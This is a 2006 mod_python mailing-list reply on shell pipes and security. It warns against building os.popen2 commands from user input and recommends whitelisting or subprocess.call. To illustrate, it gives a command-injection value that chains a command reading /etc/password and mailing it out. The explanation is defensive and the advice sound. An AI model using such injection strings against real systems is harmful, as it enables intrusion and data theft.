[mod_python] Pipes and security

webograph webograph at eml.cc
Tue Jul 25 06:55:22 EDT 2006


hi richard,

if you use a static command like "cmd", the script is perfectly all
right. you can easily run into problems if you pass unfiltered user data
to a command:
i, o = os.popen2("cmd files/%s" % user_input)
will get you into Very Big Trouble -- the user could pass "foo; cat
/etc/password | mail me at my.domain" to get list of users in your system,
for example -- in other words, execute arbitrary commands.

if you have to use user input to build commands:
- check if they are valid (if user_input in list_of_valid_options, for
example)
- escape everything properly or, even better, use process functions that
don't call the system's command interpreter (/bin/sh) on unix. use, for
example, subprocess.call (http://docs.python.org/lib/node236.html) -- no
matter what the user passes to subprocess.call(["openssl", "verify",
user_input]), the only process a malcious user can call is openssl.

regards
webograph

p.s. is there some configuration error in the mailing list? when i 
replied 15 minutes ago, the mail was sent to the original sender 
directly; afaik there should be some reply-to header appended by mailman

Richard Lewis wrote:

>Hi there,
>
>Just investigating some possible implementation methods.
>
>Does it pose a security risk in mod_python to do this sort of thing:
>
>def handler(req):
>  # code is from memory so may not be correct
>  # but its the idea thats important ;-)
>  i, o = os.popen2("cmd")
>  i.write("some data")
>  i.close()
>  
>  req.write(o.read())
>  o.close()
>
>I don't really understand it properly, but I've read before now that using 
>pipes to execute shell commands from CGI scripts can be insecure. Does the 
>same apply with Apache modules like mod_python?
>
>Cheers,
>Richard
>  
>




More information about the Mod_python mailing list